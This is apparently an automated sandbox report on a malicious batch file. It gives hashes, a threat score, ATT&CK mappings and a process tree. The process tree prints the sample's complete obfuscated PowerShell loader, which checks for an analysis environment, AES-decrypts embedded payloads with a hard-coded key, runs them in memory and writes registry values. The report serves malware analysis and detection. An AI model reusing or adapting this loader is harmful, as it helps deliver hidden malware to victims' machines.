f3cbb5d82cd929211283435c7dd79e7c853449ad23e7d4895b9fc0427759ba7f

General

Target

filetest.bat
Size

7.9MB
MD5

f88d18fc65296a1ed460e40a352e3045
SHA1

f6d9d94da2f11d0485ca057a057a06ac492bde8c
SHA256

f3cbb5d82cd929211283435c7dd79e7c853449ad23e7d4895b9fc0427759ba7f
SHA512

f193edd5c475040928e188b756d27ecb2f61ef6a1d7392bdb62e6d5bcdd5c37272849a298e9cc6265b5f67890881971ecf28f93e98edd90f6f536190999ed367
SSDEEP

49152:h4ANZ4/rNl/dichvhGpPK7kMes5mmCq/BWZHtPrBe7XTADqoh6EKQJS2H/WkTb/2:6

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2748	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2524	powershell.exe
2748	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2524	powershell.exe
Token: SeDebugPrivilege	2748	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2532 wrote to memory of 2524	2532	cmd.exe	31
PID 2532 wrote to memory of 2524	2532	cmd.exe	31
PID 2532 wrote to memory of 2524	2532	cmd.exe	31
PID 2524 wrote to memory of 2800	2524	powershell.exe	33
PID 2524 wrote to memory of 2800	2524	powershell.exe	33
PID 2524 wrote to memory of 2800	2524	powershell.exe	33
PID 2532 wrote to memory of 2952	2532	cmd.exe	34
PID 2532 wrote to memory of 2952	2532	cmd.exe	34
PID 2532 wrote to memory of 2952	2532	cmd.exe	34
PID 2532 wrote to memory of 2748	2532	cmd.exe	35
PID 2532 wrote to memory of 2748	2532	cmd.exe	35
PID 2532 wrote to memory of 2748	2532	cmd.exe	35

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\filetest.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2524
- - C:\Windows\system32\findstr.exe
    "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
    3⤵
    PID:2800
- C:\Windows\system32\cmd.exe
  cmd.exe /c echo function qmFV($REHT){ Invoke-Expression -InformationAction Ignore '$TTZK=vB[vBSvByvBstvBevBmvB.vBSvBevBcvBurvBivBtvBy.vBCvBrvBypvBtvBovBgrvBapvBhvBy.vBAevBsvB]:vB:vBCvBrvBeavBtvBevB()vB;'.Replace('vB', ''); Invoke-Expression -Debug '$TTZK.PkMPkoPkdPke=Pk[PkSPkyPksPktPkePkm.PkSPkePkcuPkrPkiPktyPk.PkCPkryPkptPkoPkgrPkapPkhPky.PkCPkiPkpPkhePkrPkMPkodPkePk]:Pk:PkCPkBCPk;'.Replace('Pk', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose '$TTZK.vsPvsavsdvsdivsnvsgvs=vs[vsSvsyvsstvsevsmvs.Svsevscvsurvsivstvsy.vsCrvsyvsptvsogvsrvsapvshvsyvs.vsPavsdvsdvsinvsgvsMovsdvsevs]:vs:vsPvsKvsCvsSvs7vs;'.Replace('vs', ''); Invoke-Expression -Debug '$TTZK.xPKxPexPyxP=[xPSxPyxPsxPtxPexPmxP.CxPoxPnxPvexPrxPtxP]:xP:xPFxProxPmBxPaxPsexP64xPSxPtrxPixPnxPg("xPhxPOxPixPbxxP/xPTxPsxPDxPUxPfxPQDxPvxPLxP4VxPDxPHxP90xPGxPfxP9kxPJCxPixPJFxPcuxPDxP8yxPAxPbxPMxPeCxP4xPWxPc=xP");'.Replace('xP', ''); Invoke-Expression -Debug '$TTZK.dkIdkVdk=dk[Sdkydksdktdkedkmdk.dkCodkndkvdkerdktdk]dk::dkFdkrdkomdkBadksdke6dk4Sdktdkridkndkg("dkBdkvdkidkt0dkjdkfdkAdkudkJdk4dk7Jdk1dkLdk6bdkOdkGdk79dkQdk=dk=");'.Replace('dk', ''); $pOIf=$TTZK.CreateDecryptor(); $TvBT=$pOIf.TransformFinalBlock($REHT, 0, $REHT.Length); $pOIf.Dispose(); $TTZK.Dispose(); $TvBT;}function MetK($REHT){ Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore '$RRoW=pANpAepAwpA-OpAbpAjpAepAcpAtpA pASypAspAtpAempA.pAIpAO.pAMpAepAmopArypASpAtrpAeapAmpA(,$REHT);'.Replace('pA', ''); Invoke-Expression -Verbose -WarningAction Inquire '$HnaT=pANpAepAwpA-OpAbpAjpAepAcpAtpA pASypAspAtpAempA.pAIpAO.pAMpAepAmopArypASpAtrpAeapAmpA;'.Replace('pA', ''); Invoke-Expression -Verbose -WarningAction Inquire '$OYGv=KVNKVeKVwKV-OKVbKVjKVeKVcKVtKV KVSyKVsKVtKVemKV.KVIKVO.KVCKVoKVmpKVreKVsKVsiKVonKV.KVGZKViKVpKVSKVtrKVeKVaKVm($RRoW, KV[KVIKVOKV.CKVoKVmKVpKVrKVeKVsKVsiKVoKVnKV.CKVoKVmKVprKVeKVsKVsiKVonKVMKVodKVe]KV:KV:DKVeKVcKVoKVmpKVrKVeKVssKV);'.Replace('KV', ''); $OYGv.CopyTo($HnaT); $OYGv.Dispose(); $RRoW.Dispose(); $HnaT.Dispose(); $HnaT.ToArray();}function EXHV($REHT,$EVat){ Invoke-Expression -Verbose '$gHke=DN[DNSDNyDNstDNeDNmDN.DNRDNeDNfDNleDNcDNtDNioDNnDN.DNAsDNsDNeDNmbDNlyDN]DN::DNLoDNaDNd([byte[]]$REHT);'.Replace('DN', ''); Invoke-Expression -InformationAction Ignore '$vNwL=$gHke.CAECAnCAtCAryCAPCAoCAiCAnCAtCA;'.Replace('CA', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire '$vNwLio.ioIioniovoiokioeio(io$ioniouiollio, $EVat);'.Replace('io', '');}function JYY($vrvS){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'MhRVQwCgfyDG;ODJpvpxTYFqN;dlOMrqSijFnyTh'; Set-ItemProperty -Path $registryPath -Name 'MhRVQwCgfyDG' -Value $vrvS; Set-ItemProperty -Path $registryPath -Name 'ODJpvpxTYFqN' -Value 'hOibx/TsDUfQDvL4VDH90Gf9kJCiJFcuD8yAbMeC4Wc='; Set-ItemProperty -Path $registryPath -Name 'dlOMrqSijFnyTh' -Value 'Bvit0jfAuJ47J1L6bOG79Q==';}$lVPp = 'C:\Users\Admin\AppData\Local\Temp\filetest.bat';$host.UI.RawUI.WindowTitle = $lVPp;$Enkb=[System.IO.File]::ReadAllText($lVPp).Split([Environment]::NewLine);foreach ($bUJs in $Enkb) { if ($bUJs.StartsWith('WWiTL')) { $DBhl=$bUJs.Substring(5); break; }}JYY $DBhl;$vrvS=[string[]]$DBhl.Split('\');Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore -Verbose '$opM = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[0].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');Invoke-Expression -Debug '$tHS = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[1].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');Invoke-Expression -Verbose -Debug '$Hrm = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[2].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');EXHV $opM $null;EXHV $tHS $null;EXHV $Hrm (,[string[]] (''));
  2⤵
  PID:2952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a901c8e51ab99fbeb040641764225b5c

SHA1
1eff20cdccc873365111207186e88feaa9e9ad37

SHA256
0d3ca1b3f1a8ee36e4aac1e0658169cb994ee28c21b8105dcf38e8c906ee0b96

SHA512
7b478939466e5b4f60a88587d2767191dc0732ae14178c52993fbab4415b22f0721dd7eb80b0815622d9fadab167306e775d9cba78b97312bbd5172dca4f7a7b

Download Submit
memory/2524-4-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

Filesize
4KB

Download
memory/2524-5-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/2524-6-0x0000000002340000-0x0000000002348000-memory.dmp

Filesize
32KB

Download
memory/2524-7-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2524-8-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2524-10-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2524-9-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2524-11-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2748-17-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/2748-18-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing